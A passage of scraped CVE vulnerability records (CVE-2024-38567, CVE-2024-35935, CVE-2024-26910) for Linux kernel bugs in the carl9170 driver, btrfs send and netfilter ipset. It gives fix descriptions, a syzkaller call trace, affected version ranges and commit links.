WARNING: CPU: 0 PID: 4721 at drivers/usb/core/urb.c:504 usb_submit_urb+0xed6/0x1880 drivers/usb/core/urb.c:504
...
Call Trace:
<TASK>
carl9170_usb_send_rx_irq_urb+0x273/0x340 drivers/net/wireless/ath/carl9170/usb.c:504
carl9170_usb_init_device drivers/net/wireless/ath/carl9170/usb.c:939 [inline]
carl9170_usb_firmware_finish drivers/net/wireless/ath/carl9170/usb.c:999 [inline]
carl9170_usb_firmware_step2+0x175/0x240 drivers/net/wireless/ath/carl9170/usb.c:1028
request_firmware_work_func+0x130/0x240 drivers/base/firmware_loader/main.c:1107
process_one_work+0x9bf/0x1710 kernel/workqueue.c:2289
worker_thread+0x669/0x1090 kernel/workqueue.c:2436
kthread+0x2e8/0x3a0 kernel/kthread.c:376
ret_from_fork+0x1f/0x30 arch/x86/entry/entry_64.S:308
</TASK>
[2] Related syzkaller crashes:
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: a84fab3cbfdc427e7d366f1cc844f27b2084c26c Version: a84fab3cbfdc427e7d366f1cc844f27b2084c26c Version: a84fab3cbfdc427e7d366f1cc844f27b2084c26c Version: a84fab3cbfdc427e7d366f1cc844f27b2084c26c Version: a84fab3cbfdc427e7d366f1cc844f27b2084c26c Version: a84fab3cbfdc427e7d366f1cc844f27b2084c26c Version: a84fab3cbfdc427e7d366f1cc844f27b2084c26c Version: a84fab3cbfdc427e7d366f1cc844f27b2084c26c Version: a84fab3cbfdc427e7d366f1cc844f27b2084c26c |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:21:31.173Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/eb0f2fc3ff5806cc572cd9055ce7c52a01e97645"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ac3ed46a8741d464bc70ebdf7433c1d786cf329d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8650725bb0a48b206d5a8ddad3a7488f9a5985b7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6a9892bf24c906b4d6b587f8759ca38bff672582"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/265c3cda471c26e0f25d0c755da94e1eb15d7a0c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/62eb07923f3693d55b0c2d9a5a4f1ad72cb6b8fd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/03ddc74bdfd71b84a55c9f2185d8787f258422cd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0fa08a55201ab9be72bacb8ea93cf752d338184f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b6dd09b3dac89b45d1ea3e3bd035a3859c0369a0"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-38567",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T17:14:28.409371Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:56.503Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/wireless/ath/carl9170/usb.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "eb0f2fc3ff5806cc572cd9055ce7c52a01e97645",
"status": "affected",
"version": "a84fab3cbfdc427e7d366f1cc844f27b2084c26c",
"versionType": "git"
},
{
"lessThan": "ac3ed46a8741d464bc70ebdf7433c1d786cf329d",
"status": "affected",
"version": "a84fab3cbfdc427e7d366f1cc844f27b2084c26c",
"versionType": "git"
},
{
"lessThan": "8650725bb0a48b206d5a8ddad3a7488f9a5985b7",
"status": "affected",
"version": "a84fab3cbfdc427e7d366f1cc844f27b2084c26c",
"versionType": "git"
},
{
"lessThan": "6a9892bf24c906b4d6b587f8759ca38bff672582",
"status": "affected",
"version": "a84fab3cbfdc427e7d366f1cc844f27b2084c26c",
"versionType": "git"
},
{
"lessThan": "265c3cda471c26e0f25d0c755da94e1eb15d7a0c",
"status": "affected",
"version": "a84fab3cbfdc427e7d366f1cc844f27b2084c26c",
"versionType": "git"
},
{
"lessThan": "62eb07923f3693d55b0c2d9a5a4f1ad72cb6b8fd",
"status": "affected",
"version": "a84fab3cbfdc427e7d366f1cc844f27b2084c26c",
"versionType": "git"
},
{
"lessThan": "03ddc74bdfd71b84a55c9f2185d8787f258422cd",
"status": "affected",
"version": "a84fab3cbfdc427e7d366f1cc844f27b2084c26c",
"versionType": "git"
},
{
"lessThan": "0fa08a55201ab9be72bacb8ea93cf752d338184f",
"status": "affected",
"version": "a84fab3cbfdc427e7d366f1cc844f27b2084c26c",
"versionType": "git"
},
{
"lessThan": "b6dd09b3dac89b45d1ea3e3bd035a3859c0369a0",
"status": "affected",
"version": "a84fab3cbfdc427e7d366f1cc844f27b2084c26c",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/wireless/ath/carl9170/usb.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.37"
},
{
"lessThan": "2.6.37",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.316",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.278",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.219",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.161",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.93",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.33",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.316",
"versionStartIncluding": "2.6.37",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.278",
"versionStartIncluding": "2.6.37",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.219",
"versionStartIncluding": "2.6.37",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.161",
"versionStartIncluding": "2.6.37",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.93",
"versionStartIncluding": "2.6.37",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.33",
"versionStartIncluding": "2.6.37",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.12",
"versionStartIncluding": "2.6.37",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.3",
"versionStartIncluding": "2.6.37",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "2.6.37",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: carl9170: add a proper sanity check for endpoints\n\nSyzkaller reports [1] hitting a warning which is caused by presence\nof a wrong endpoint type at the URB sumbitting stage. While there\nwas a check for a specific 4th endpoint, since it can switch types\nbetween bulk and interrupt, other endpoints are trusted implicitly.\nSimilar warning is triggered in a couple of other syzbot issues [2].\n\nFix the issue by doing a comprehensive check of all endpoints\ntaking into account difference between high- and full-speed\nconfiguration.\n\n[1] Syzkaller report:\n...\nWARNING: CPU: 0 PID: 4721 at drivers/usb/core/urb.c:504 usb_submit_urb+0xed6/0x1880 drivers/usb/core/urb.c:504\n...\nCall Trace:\n \u003cTASK\u003e\n carl9170_usb_send_rx_irq_urb+0x273/0x340 drivers/net/wireless/ath/carl9170/usb.c:504\n carl9170_usb_init_device drivers/net/wireless/ath/carl9170/usb.c:939 [inline]\n carl9170_usb_firmware_finish drivers/net/wireless/ath/carl9170/usb.c:999 [inline]\n carl9170_usb_firmware_step2+0x175/0x240 drivers/net/wireless/ath/carl9170/usb.c:1028\n request_firmware_work_func+0x130/0x240 drivers/base/firmware_loader/main.c:1107\n process_one_work+0x9bf/0x1710 kernel/workqueue.c:2289\n worker_thread+0x669/0x1090 kernel/workqueue.c:2436\n kthread+0x2e8/0x3a0 kernel/kthread.c:376\n ret_from_fork+0x1f/0x30 arch/x86/entry/entry_64.S:308\n \u003c/TASK\u003e\n\n[2] Related syzkaller crashes:"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:14:16.695Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/eb0f2fc3ff5806cc572cd9055ce7c52a01e97645"
},
{
"url": "https://git.kernel.org/stable/c/ac3ed46a8741d464bc70ebdf7433c1d786cf329d"
},
{
"url": "https://git.kernel.org/stable/c/8650725bb0a48b206d5a8ddad3a7488f9a5985b7"
},
{
"url": "https://git.kernel.org/stable/c/6a9892bf24c906b4d6b587f8759ca38bff672582"
},
{
"url": "https://git.kernel.org/stable/c/265c3cda471c26e0f25d0c755da94e1eb15d7a0c"
},
{
"url": "https://git.kernel.org/stable/c/62eb07923f3693d55b0c2d9a5a4f1ad72cb6b8fd"
},
{
"url": "https://git.kernel.org/stable/c/03ddc74bdfd71b84a55c9f2185d8787f258422cd"
},
{
"url": "https://git.kernel.org/stable/c/0fa08a55201ab9be72bacb8ea93cf752d338184f"
},
{
"url": "https://git.kernel.org/stable/c/b6dd09b3dac89b45d1ea3e3bd035a3859c0369a0"
}
],
"title": "wifi: carl9170: add a proper sanity check for endpoints",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-38567",
"datePublished": "2024-06-19T13:35:34.254Z",
"dateReserved": "2024-06-18T19:36:34.923Z",
"dateUpdated": "2025-11-04T17:21:31.173Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-35935 (GCVE-0-2024-35935)
Vulnerability from cvelistv5
Published
2024-05-19 10:10
Modified
2025-05-04 09:08
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
btrfs: send: handle path ref underflow in header iterate_inode_ref()
Change BUG_ON to proper error handling if building the path buffer
fails. The pointers are not printed so we don't accidentally leak kernel
addresses.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:49.026Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/be2b6bcc936ae17f42fff6494106a5660b35d8d3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/024529c27c8b4b273325a169e078337c8279e229"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4720d590c4cb5d9ffa0060b89743651cc7e995f9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2f6174fd4ccf403b42b3d5f0d1b6b496a0e5330a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9ae356c627b493323e1433dcb27a26917668c07c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c1363ed8867b81ea169fba2ccc14af96a85ed183"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/03938619a1e718b6168ae4528e1b0f979293f1a5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3c6ee34c6f9cd12802326da26631232a61743501"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35935",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:40:55.413538Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:15.162Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/btrfs/send.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "be2b6bcc936ae17f42fff6494106a5660b35d8d3",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "024529c27c8b4b273325a169e078337c8279e229",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "4720d590c4cb5d9ffa0060b89743651cc7e995f9",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "2f6174fd4ccf403b42b3d5f0d1b6b496a0e5330a",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "9ae356c627b493323e1433dcb27a26917668c07c",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "c1363ed8867b81ea169fba2ccc14af96a85ed183",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "03938619a1e718b6168ae4528e1b0f979293f1a5",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "3c6ee34c6f9cd12802326da26631232a61743501",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/btrfs/send.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.155",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.86",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.27",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.6",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.155",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.86",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.27",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: send: handle path ref underflow in header iterate_inode_ref()\n\nChange BUG_ON to proper error handling if building the path buffer\nfails. The pointers are not printed so we don\u0027t accidentally leak kernel\naddresses."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:08:46.079Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/be2b6bcc936ae17f42fff6494106a5660b35d8d3"
},
{
"url": "https://git.kernel.org/stable/c/024529c27c8b4b273325a169e078337c8279e229"
},
{
"url": "https://git.kernel.org/stable/c/4720d590c4cb5d9ffa0060b89743651cc7e995f9"
},
{
"url": "https://git.kernel.org/stable/c/2f6174fd4ccf403b42b3d5f0d1b6b496a0e5330a"
},
{
"url": "https://git.kernel.org/stable/c/9ae356c627b493323e1433dcb27a26917668c07c"
},
{
"url": "https://git.kernel.org/stable/c/c1363ed8867b81ea169fba2ccc14af96a85ed183"
},
{
"url": "https://git.kernel.org/stable/c/03938619a1e718b6168ae4528e1b0f979293f1a5"
},
{
"url": "https://git.kernel.org/stable/c/3c6ee34c6f9cd12802326da26631232a61743501"
}
],
"title": "btrfs: send: handle path ref underflow in header iterate_inode_ref()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35935",
"datePublished": "2024-05-19T10:10:42.319Z",
"dateReserved": "2024-05-17T13:50:33.130Z",
"dateUpdated": "2025-05-04T09:08:46.079Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26910 (GCVE-0-2024-26910)
Vulnerability from cvelistv5
Published
2024-04-17 15:59
Modified
2025-05-04 12:55
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
netfilter: ipset: fix performance regression in swap operation
The patch "netfilter: ipset: fix race condition between swap/destroy
and kernel side add/del/test", commit 28628fa9 fixes a race condition.
But the synchronize_rcu() added to the swap function unnecessarily slows
it down: it can safely be moved to destroy and use call_rcu() instead.
Eric Dumazet pointed out that simply calling the destroy functions as
rcu callback does not work: sets with timeout use garbage collectors
which need cancelling at destroy which can wait. Therefore the destroy
functions are split into two: cancelling garbage collectors safely at
executing the command received by netlink and moving the remaining
part only into the rcu callback.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 427deb5ba5661c4ae1cfb35955d2e01bd5f3090a Version: e7152a138a5ac77439ff4e7a7533448a7d4c260d Version: 8bb930c3a1eacec1b14817f565ff81667c7c5dfa Version: 875ee3a09e27b7adb7006ca6d16faf7f33415aa5 Version: 23c31036f862582f98386120aee55c9ae23d7899 Version: 28628fa952fefc7f2072ce6e8016968cc452b1ba Version: 28628fa952fefc7f2072ce6e8016968cc452b1ba Version: a12606e5ad0cee8f4ba3ec68561c4d6275d2df57 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26910",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-04-23T14:01:29.284146Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:48:39.956Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.455Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c7f2733e5011bfd136f1ca93497394d43aa76225"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a24d5f2ac8ef702a58e55ec276aad29b4bd97e05"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c2dc077d8f722a1c73a24e674f925602ee5ece49"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/653bc5e6d9995d7d5f497c665b321875a626161c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b93a6756a01f4fd2f329a39216f9824c56a66397"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/970709a67696b100a57b33af1a3d75fc34b747eb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/97f7cf1cd80eeed3b7c808b7c12463295c751001"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"include/linux/netfilter/ipset/ip_set.h",
"net/netfilter/ipset/ip_set_bitmap_gen.h",
"net/netfilter/ipset/ip_set_core.c",
"net/netfilter/ipset/ip_set_hash_gen.h",
"net/netfilter/ipset/ip_set_list_set.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "c7f2733e5011bfd136f1ca93497394d43aa76225",
"status": "affected",
"version": "427deb5ba5661c4ae1cfb35955d2e01bd5f3090a",
"versionType": "git"
},
{
"lessThan": "a24d5f2ac8ef702a58e55ec276aad29b4bd97e05",
"status": "affected",
"version": "e7152a138a5ac77439ff4e7a7533448a7d4c260d",
"versionType": "git"
},
{
"lessThan": "c2dc077d8f722a1c73a24e674f925602ee5ece49",
"status": "affected",
"version": "8bb930c3a1eacec1b14817f565ff81667c7c5dfa",
"versionType": "git"
},
{
"lessThan": "653bc5e6d9995d7d5f497c665b321875a626161c",
"status": "affected",
"version": "875ee3a09e27b7adb7006ca6d16faf7f33415aa5",
"versionType": "git"
},
{
"lessThan": "b93a6756a01f4fd2f329a39216f9824c56a66397",
"status": "affected",
"version": "23c31036f862582f98386120aee55c9ae23d7899",
"versionType": "git"
},
{
"lessThan": "970709a67696b100a57b33af1a3d75fc34b747eb",
"status": "affected",
"version": "28628fa952fefc7f2072ce6e8016968cc452b1ba",
"versionType": "git"
},
{
"lessThan": "97f7cf1cd80eeed3b7c808b7c12463295c751001",
"status": "affected",
"version": "28628fa952fefc7f2072ce6e8016968cc452b1ba",
"versionType": "git"
},
{
"status": "affected",
"version": "a12606e5ad0cee8f4ba3ec68561c4d6275d2df57",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"include/linux/netfilter/ipset/ip_set.h",
"net/netfilter/ipset/ip_set_bitmap_gen.h",
"net/netfilter/ipset/ip_set_core.c",
"net/netfilter/ipset/ip_set_hash_gen.h",
"net/netfilter/ipset/ip_set_list_set.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.7"
},
{
"lessThan": "6.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.79",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.18",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.6",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"versionStartIncluding": "5.4.264",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "5.10.204",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "5.15.143",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.79",
"versionStartIncluding": "6.1.68",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.18",
"versionStartIncluding": "6.6.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.6",
"versionStartIncluding": "6.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "6.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.19.302",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: ipset: fix performance regression in swap operation\n\nThe patch \"netfilter: ipset: fix race condition between swap/destroy\nand kernel side add/del/test\", commit 28628fa9 fixes a race condition.\nBut the synchronize_rcu() added to the swap function unnecessarily slows\nit down: it can safely be moved to destroy and use call_rcu() instead.\n\nEric Dumazet pointed out that simply calling the destroy functions as\nrcu callback does not work: sets with timeout use garbage collectors\nwhich need cancelling at destroy which can wait. Therefore the destroy\nfunctions are split into two: cancelling garbage collectors safely at\nexecuting the command received by netlink and moving the remaining\npart only into the rcu callback."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:55:08.631Z",
